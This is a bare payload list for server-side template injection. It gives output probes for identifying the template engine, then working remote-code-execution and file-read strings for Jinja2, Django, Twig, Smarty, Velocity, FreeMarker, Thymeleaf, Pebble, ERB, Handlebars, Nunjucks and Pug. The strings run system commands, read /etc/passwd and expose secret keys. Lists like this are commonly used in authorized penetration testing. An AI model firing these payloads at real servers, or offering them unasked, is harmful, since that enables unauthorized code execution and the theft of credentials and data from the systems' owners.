# Server-Side Template Injection — engine detection + RCE

# --- Probes (engine detection via output) ---
{{7*7}}
${7*7}
#{7*7}
<%= 7*7 %>
{7*7}
[[${7*7}]]
{{7*'7'}}
${{<%[%'"}}%\
{{4*4}}[[5*5]]
{{7*7}}${7*7}

# --- Jinja2 / Flask ---
{{config}}
{{config.items()}}
{{''.__class__.__mro__[1].__subclasses__()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
{{lipsum.__globals__['os'].popen('id').read()}}
{{cycler.__init__.__globals__.os.popen('id').read()}}
{{self.__init__.__globals__.__builtins__.__import__('os').popen('id').read()}}
{%for c in ''.__class__.__base__.__subclasses__()%}{%if c.__name__=='catch_warnings'%}{{c()._module.__builtins__['__import__']('os').popen('id').read()}}{%endif%}{%endfor%}
{{url_for.__globals__.__builtins__.open('/etc/passwd').read()}}

# --- Django ---
{% debug %}
{{ settings.SECRET_KEY }}
{% load subprocess %}{% subprocess 'id' %}

# --- Twig (Symfony) ---
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{['id',1]|sort('system')}}
{{['cat\x20/etc/passwd']|filter('system')}}
{{['id']|map('system')}}
{{_self.env.enableDebug()}}

# --- Smarty ---
{system('id')}
{php}system('id');{/php}
{self::getStreamVariable("file:///etc/passwd")}

# --- Velocity (Java) ---
#set($str=$class.inspect("java.lang.String").type)
#set($runtime=$class.inspect("java.lang.Runtime").type.getRuntime())
#set($process=$runtime.exec("id"))
#set($x=$process.inputStream.readAllBytes())$x

# --- FreeMarker (Java) ---
<#assign x="freemarker.template.utility.Execute"?new()>${x("id")}
${product.class.protectionDomain.codeSource.location.toURI().resolve('/etc/passwd').toURL().openStream()}
<#assign e="freemarker.template.utility.ObjectConstructor"?new()>${e("java.lang.ProcessBuilder",["id"]).start()}
${"freemarker.template.utility.Execute"?new()("id")}

# --- Thymeleaf ---
__${T(java.lang.Runtime).getRuntime().exec("id")}__::.x
*{T(java.lang.Runtime).getRuntime().exec('id')}
${T(java.lang.Runtime).getRuntime().exec('cat /etc/passwd')}

# --- Pebble ---
{{ variable.getClass().forName("java.lang.Runtime").getRuntime().exec("id") }}

# --- ERB (Ruby) ---
<%= 7 * 7 %>
<%= system('id') %>
<%= `id` %>
<%= IO.popen('id').read %>
<%= File.open('/etc/passwd').read %>

# --- Handlebars (JS) ---
{{#with "s" as |string|}}{{#with "e"}}{{#with split as |conslist|}}{{this.pop}}{{this.push (lookup string.sub "constructor")}}{{this.pop}}{{#with string.split as |codelist|}}{{this.pop}}{{this.push "return require('child_process').exec('id');"}}{{this.pop}}{{#each conslist}}{{#with (string.sub.apply 0 codelist)}}{{this}}{{/with}}{{/each}}{{/with}}{{/with}}{{/with}}{{/with}}

# --- Mustache / Nunjucks ---
{{range.constructor("return global.process.mainModule.require('child_process').execSync('id')")()}}
{{lookup (lookup global 'require') 'child_process'}}

# --- Pug / Jade ---
#{root.process.mainModule.require('child_process').execSync('id')}
- var x = root.process.mainModule.require('child_process').execSync('id')
